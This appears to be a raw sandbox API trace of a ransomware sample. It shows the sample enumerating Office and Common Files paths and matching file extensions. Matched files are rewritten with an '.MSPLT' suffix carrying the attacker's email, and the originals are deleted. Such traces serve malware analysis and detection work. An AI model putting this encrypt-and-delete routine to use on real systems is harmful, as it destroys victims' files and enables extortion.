lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0321.768] lstrlenW (lpString=".xlsx") returned 5 [0321.768] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0321.768] lstrlenW (lpString=".ppt") returned 4 [0321.768] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0321.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.768] lstrlenW (lpString=".zip") returned 4 [0321.768] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0321.768] lstrlenW (lpString=".rar") returned 4 [0321.768] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0321.768] lstrlenW (lpString=".bz2") returned 4 [0321.768] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0321.768] lstrlenW (lpString=".7z") returned 3 [0321.768] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0321.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.768] lstrlenW (lpString=".dbf") returned 4 [0321.768] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0321.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.769] lstrlenW (lpString=".1cd") returned 4 [0321.769] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0321.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0321.769] lstrlenW (lpString=".jpg") returned 4 [0321.769] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0321.769] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0321.769] lstrlenW (lpString="DD01162_.WMF") returned 12 [0321.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0321.772] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2300) returned 1 [0321.772] CloseHandle (hObject=0x3b0) returned 1 [0321.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf")) returned 0x220 [0321.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0321.773] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.773] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0321.775] GetLastError () returned 0x0 [0321.775] ReadFile (in: hFile=0x3b0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x8fc, lpOverlapped=0x0) returned 1 [0321.829] WriteFile (in: hFile=0x560, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x900, lpOverlapped=0x0) returned 1 [0321.832] ReadFile (in: hFile=0x3b0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0321.832] WriteFile (in: hFile=0x560, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0321.832] SetEndOfFile (hFile=0x560) returned 1 [0321.833] CloseHandle (hObject=0x560) returned 1 [0321.833] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0321.834] SetEndOfFile (hFile=0x3b0) returned 1 [0321.840] CloseHandle (hObject=0x3b0) returned 1 [0321.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0321.841] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf")) returned 1 [0321.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.843] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.843] lstrlenW (lpString=".doc") returned 4 [0321.843] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0321.843] lstrlenW (lpString=".docx") returned 5 [0321.843] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0321.843] lstrlenW (lpString=".pdf") returned 4 [0321.843] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0321.843] lstrlenW (lpString=".xls") returned 4 [0321.843] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0321.843] lstrlenW (lpString=".xlsx") returned 5 [0321.844] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0321.844] lstrlenW (lpString=".ppt") returned 4 [0321.844] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0321.844] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.844] lstrlenW (lpString=".zip") returned 4 [0321.845] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0321.845] lstrlenW (lpString=".rar") returned 4 [0321.845] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0321.845] lstrlenW (lpString=".bz2") returned 4 [0321.845] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0321.845] lstrlenW (lpString=".7z") returned 3 [0321.845] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0321.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.845] lstrlenW (lpString=".dbf") returned 4 [0321.845] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0321.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.845] lstrlenW (lpString=".1cd") returned 4 [0321.846] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0321.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.846] lstrlenW (lpString=".jpg") returned 4 [0321.846] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0321.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.846] lstrlenW (lpString=".doc") returned 4 [0321.846] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0321.846] lstrlenW (lpString=".docx") returned 5 [0321.846] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0321.846] lstrlenW (lpString=".pdf") returned 4 [0321.847] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0321.847] lstrlenW (lpString=".xls") returned 4 [0321.847] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0321.847] lstrlenW (lpString=".xlsx") returned 5 [0321.847] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0321.847] lstrlenW (lpString=".ppt") returned 4 [0321.847] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0321.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.847] lstrlenW (lpString=".zip") returned 4 [0321.847] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0321.847] lstrlenW (lpString=".rar") returned 4 [0321.847] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0321.847] lstrlenW (lpString=".bz2") returned 4 [0321.847] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0321.848] lstrlenW (lpString=".7z") returned 3 [0321.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0321.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.848] lstrlenW (lpString=".dbf") returned 4 [0321.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0321.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.848] lstrlenW (lpString=".1cd") returned 4 [0321.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0321.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 68 [0321.848] lstrlenW (lpString=".jpg") returned 4 [0321.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0321.849] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0321.849] lstrlenW (lpString="DD01166_.WMF") returned 12 [0321.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 39 os_tid = 0xdf8 [0280.467] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x3890060 [0280.467] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x38a0068 [0280.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc2a0 [0280.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b7d8 [0280.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc330 [0280.468] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x3a8b020 [0280.472] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc348 [0280.472] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc348, Size=0x20) returned 0x4ae010 [0280.472] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc348 [0280.472] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc348, Size=0x20) returned 0x4adfe8 [0280.473] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0280.473] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0280.473] Wow64DisableWow64FsRedirection (in: OldValue=0x2acff50 | out: OldValue=0x2acff50*=0x0) returned 1 [0280.473] lstrlenW (lpString="kernel32.dll") returned 12 [0280.473] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae010 | out: hHeap=0x470000) returned 1 [0280.473] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0280.473] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adfe8 | out: hHeap=0x470000) returned 1 [0280.473] Sleep (dwMilliseconds=0x64) [0283.211] Sleep (dwMilliseconds=0x64) [0283.509] Sleep (dwMilliseconds=0x64) [0283.792] Sleep (dwMilliseconds=0x64) [0284.039] Sleep (dwMilliseconds=0x64) [0284.321] Sleep (dwMilliseconds=0x64) [0284.489] Sleep (dwMilliseconds=0x64) [0284.823] Sleep (dwMilliseconds=0x64) [0285.072] Sleep (dwMilliseconds=0x64) [0285.380] Sleep (dwMilliseconds=0x64) [0285.703] Sleep (dwMilliseconds=0x64) [0285.965] Sleep (dwMilliseconds=0x64) [0286.274] Sleep (dwMilliseconds=0x64) [0286.452] Sleep (dwMilliseconds=0x64) [0286.571] Sleep (dwMilliseconds=0x64) [0287.482] Sleep (dwMilliseconds=0x64) [0287.671] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.671] lstrlenW (lpString="boxed-delete.avi") returned 16 [0287.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0287.830] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=48936) returned 1 [0287.830] CloseHandle (hObject=0x3e4) returned 1 [0287.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0287.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.848] lstrlenW (lpString=".doc") returned 4 [0287.848] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.848] lstrlenW (lpString=".docx") returned 5 [0287.848] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0287.848] lstrlenW (lpString=".pdf") returned 4 [0287.848] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.848] lstrlenW (lpString=".xls") returned 4 [0287.848] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.848] lstrlenW (lpString=".xlsx") returned 5 [0287.849] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0287.849] lstrlenW (lpString=".ppt") returned 4 [0287.849] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.849] lstrlenW (lpString=".zip") returned 4 [0287.849] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString=".rar") returned 4 [0287.849] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString=".bz2") returned 4 [0287.849] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString=".7z") returned 3 [0287.849] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.849] lstrlenW (lpString=".dbf") returned 4 [0287.849] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.849] lstrlenW (lpString=".1cd") returned 4 [0287.849] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.849] lstrlenW (lpString=".jpg") returned 4 [0287.849] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.849] lstrlenW (lpString=".doc") returned 4 [0287.849] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.849] lstrlenW (lpString=".docx") returned 5 [0287.849] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0287.850] lstrlenW (lpString=".pdf") returned 4 [0287.850] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString=".xls") returned 4 [0287.850] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString=".xlsx") returned 5 [0287.850] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0287.850] lstrlenW (lpString=".ppt") returned 4 [0287.850] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.850] lstrlenW (lpString=".zip") returned 4 [0287.850] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString=".rar") returned 4 [0287.850] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString=".bz2") returned 4 [0287.850] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString=".7z") returned 3 [0287.850] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.850] lstrlenW (lpString=".dbf") returned 4 [0287.850] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.850] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.850] lstrlenW (lpString=".1cd") returned 4 [0287.850] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.851] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0287.851] lstrlenW (lpString=".jpg") returned 4 [0287.851] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.851] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.851] lstrlenW (lpString="delete.avi") returned 10 [0287.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0287.877] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=208408) returned 1 [0287.877] CloseHandle (hObject=0x348) returned 1 [0287.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0287.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.882] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.882] lstrlenW (lpString=".doc") returned 4 [0287.882] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.882] lstrlenW (lpString=".docx") returned 5 [0287.882] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0287.882] lstrlenW (lpString=".pdf") returned 4 [0287.883] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString=".xls") returned 4 [0287.883] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString=".xlsx") returned 5 [0287.883] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0287.883] lstrlenW (lpString=".ppt") returned 4 [0287.883] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.883] lstrlenW (lpString=".zip") returned 4 [0287.883] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString=".rar") returned 4 [0287.883] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString=".bz2") returned 4 [0287.883] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString=".7z") returned 3 [0287.883] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.883] lstrlenW (lpString=".dbf") returned 4 [0287.883] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.883] lstrlenW (lpString=".1cd") returned 4 [0287.883] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.883] lstrlenW (lpString=".jpg") returned 4 [0287.883] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.884] lstrlenW (lpString=".doc") returned 4 [0287.884] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString=".docx") returned 5 [0287.884] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0287.884] lstrlenW (lpString=".pdf") returned 4 [0287.884] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString=".xls") returned 4 [0287.884] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString=".xlsx") returned 5 [0287.884] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0287.884] lstrlenW (lpString=".ppt") returned 4 [0287.884] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.884] lstrlenW (lpString=".zip") returned 4 [0287.884] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString=".rar") returned 4 [0287.884] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString=".bz2") returned 4 [0287.884] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString=".7z") returned 3 [0287.884] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.884] lstrlenW (lpString=".dbf") returned 4 [0287.884] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.884] lstrlenW (lpString=".1cd") returned 4 [0287.884] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 67 [0287.885] lstrlenW (lpString=".jpg") returned 4 [0287.885] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.885] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.885] lstrlenW (lpString="auxpad.xml") returned 10 [0287.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.919] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=212) returned 1 [0287.919] CloseHandle (hObject=0x420) returned 1 [0287.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0287.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 75 [0287.920] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 